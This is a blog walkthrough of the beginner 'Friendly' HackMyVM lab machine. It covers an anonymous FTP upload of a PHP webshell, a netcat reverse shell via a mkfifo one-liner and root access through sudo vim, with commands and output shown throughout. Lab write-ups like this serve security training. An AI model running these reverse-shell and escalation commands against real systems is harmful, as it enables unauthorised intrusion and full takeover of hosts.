Post

Write-up Friendly on HackMyVM

Posted
By eMVee 9 min read

A while back I hacked “Friendly”. An easy machine that is available on HackMyVM. This machine is good for beginners and clearly shows which possible vulnerabilities can be combined to gain access to a system.

Getting started

First things first! We should start by creating a project directory for our target machine.

1
2
3
4
5
6
7
8

┌──(emvee㉿kali)-[~]
└─$ cd Documents/HMV

┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ mkdir Friendly

┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ cd Friendly

Next we should identify the IP address of our target. One of the tools to do this is fping. It generates a list with IP addresses available in your subnet.

1
2
3
4
5
6
7

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ fping -ag 10.0.2.0/24 2> /dev/null                     
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.7
10.0.2.15

To make our life easier we should assign the IP address to a variable. This is useful for the commands we use.

1
2
3

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ ip=10.0.2.7

Enumeration

Time to enumerate! We should identify open ports, running services and if possible, we should identify versions. Nmap can discover a lot, so we should start a port scan with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for emvee: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 22:15 CEST
Nmap scan report for 10.0.2.7
Host is up (0.00096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.96 ms 10.0.2.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds

The port scan has finished pretty quick. We should analyze the results and take some notes.

  • Linux, probably a Debian
  • Port 21
    • FTP
    • Anonymous
    • index.html file
  • Port 80
    • HTTP
    • Apache 2.4.54
    • Title: Apache2 Debian Default Page: It works

The most interesting services to check first ifs the FTP service. We should check if we can upload any file to this service. If we can upload anything and access the file via the webserver we might gain control. Let’s create a file with touch.

1
2

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ touch test

Next we should logon to the FTP server as anonymous and try to upload the file with `put.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ ftp $ip -a                        
Connected to 10.0.2.7.
220 ProFTPD Server (friendly) [::ffff:10.0.2.7]
331 Anonymous login ok, send your complete email address as your password
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I
ftp> put test 
local: test remote: test
229 Entering Extended Passive Mode (|||16428|)
150 Opening BINARY mode data connection for test
     0        0.00 KiB/s 
226 Transfer complete
ftp> ls
229 Entering Extended Passive Mode (|||2142|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
-rw-r--r--   1 ftp      nogroup         0 Sep  1 20:17 test
226 Transfer complete
ftp>

We were able to upload the file. Now we should create a reverse shell page in PHP. We can use the wwolf-php-webshell PHP file. This is an awesome page were we can run commands or upload any other file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ nano shell.php        

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ head shell.php                                                    
#<?php
/*******************************************************************************
 * Copyright 2017 WhiteWinterWolf
 * https://www.whitewinterwolf.com/tags/php-webshell/
 *
 * This file is part of wwolf-php-webshell.
 *
 * wwwolf-php-webshell is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or

Now we should upload the file again via the FTP service with the anonymous account.

1
2
3
4
5
6
7
8
9

ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||4756|)
150 Opening BINARY mode data connection for shell.php
100% |**********************************************************************************************************************************************************************************************|  7205       91.61 MiB/s    00:00 ETA
226 Transfer complete
7205 bytes sent in 00:00 (9.01 MiB/s)
ftp> exit
221 Goodbye.

Initial access

As soon as the shell.php file has been uploaded we should try to visit the page in the browser.

image

Let’s run some commands whoamilid;hostname;ip a; pwd to see who we are, were we are working on and what the directory is we are currently working in. image

We can run any command and it looks like we are www-data. This gives us the ability to gain a reverse shell. We should a netcat listener on our attacking machine.

1
2
3
4

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...

Next we should run the following command to start a reverse shell via the browser.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.15 1234 >/tmp/f

image

After executing the command we should check our netcat listener.

1
2
3
4
5
6
7
8

┌──(emvee㉿kali)-[~/Documents/HMV/Friendly]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.7] 42930
bash: cannot set terminal process group (434): Inappropriate ioctl for device
bash: no job control in this shell
www-data@friendly:/var/www/html$

We git a connection established from our victim machine. Let’s see if we can discover any juicy files in the home directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

www-data@friendly:/var/www/html$ ls /home -ahlR
ls /home -ahlR
/home:
total 12K
drwxr-xr-x  3 root    root    4.0K Feb 21  2023 .
drwxr-xr-x 18 root    root    4.0K Mar 11 04:00 ..
drwxr-xr-x  5 RiJaba1 RiJaba1 4.0K Mar 11 04:13 RiJaba1

/home/RiJaba1:
total 24K
drwxr-xr-x 5 RiJaba1 RiJaba1 4.0K Mar 11 04:13 .
drwxr-xr-x 3 root    root    4.0K Feb 21  2023 ..
lrwxrwxrwx 1 RiJaba1 RiJaba1    9 Feb 23  2023 .bash_history -> /dev/null
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Mar 11 04:18 CTF
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Mar 11 03:59 Private
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Feb 21  2023 YouTube
-r--r--r-- 1 RiJaba1 RiJaba1   33 Mar 11 04:13 user.txt

/home/RiJaba1/CTF:
total 12K
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Mar 11 04:18 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4.0K Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   21 Mar 11 04:18 ...

/home/RiJaba1/Private:
total 12K
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Mar 11 03:59 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4.0K Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   45 Mar 11 03:59 targets.txt

/home/RiJaba1/YouTube:
total 12K
drwxr-xr-x 2 RiJaba1 RiJaba1 4.0K Feb 21  2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4.0K Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   41 Feb 21  2023 ideas.txt
www-data@friendly:/var/www/html$

There are some files readable for the whole world. One of them is the user flag, what we could open with the cat command.

1
2
3
4
5
6

www-data@friendly:/var/www/html$ cd /home/RiJaba1
cd /home/RiJaba1
www-data@friendly:/home/RiJaba1$ cat user.txt
cat user.txt
USER-FLAG-HAS-BEEN-CAPTURED

Privilege escalation

We got the user flag, so we should continue and gain more privileges…

1
2
3
4
5
6
7
8
9
10
11
12
13
14

www-data@friendly:/home/RiJaba1/YouTube$ cd ~
cd ~
www-data@friendly:/var/www$ ls
ls
html
www-data@friendly:/var/www$ sudo -l
sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
www-data@friendly:/var/www$

We can use vim with sudo permissions. This is a known privilege escalation path and it is fully explained on GTFObins. So let’s follow the steps explained on the website. And capture the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94

www-data@friendly:/var/www/html$ sudo /usr/bin/vim -c ':!/bin/sh'
sudo /usr/bin/vim -c ':!/bin/sh'
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'


















































:!/bin/sh
whoami
root
hostname
friendly
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a2:9f:c0 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.7/24 brd 10.0.2.255 scope global dynamic enp0s3
       valid_lft 548sec preferred_lft 548sec
    inet6 fe80::a00:27ff:fea2:9fc0/64 scope link 
       valid_lft forever preferred_lft forever
ls /root
interfaces.sh
root.txt
cat root.txt
cat: root.txt: No such file or directory
cat /root/root.txt
Not yet! Find root.txt.

Well, the root flag was not in the root directory. Let’s find it.

1
2
3
4
5

find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt

We have found the root flag in the log directory of Apache. Let’s capture the flag!

1
2
3

cat /var/log/apache2/root.txt
ROOT-FLAG-HAS-BEEN-CAPTURED
CTF, HackMyVM
HackMyVM OSCP PNPT ftp sudo
This post is licensed under CC BY 4.0 by the author.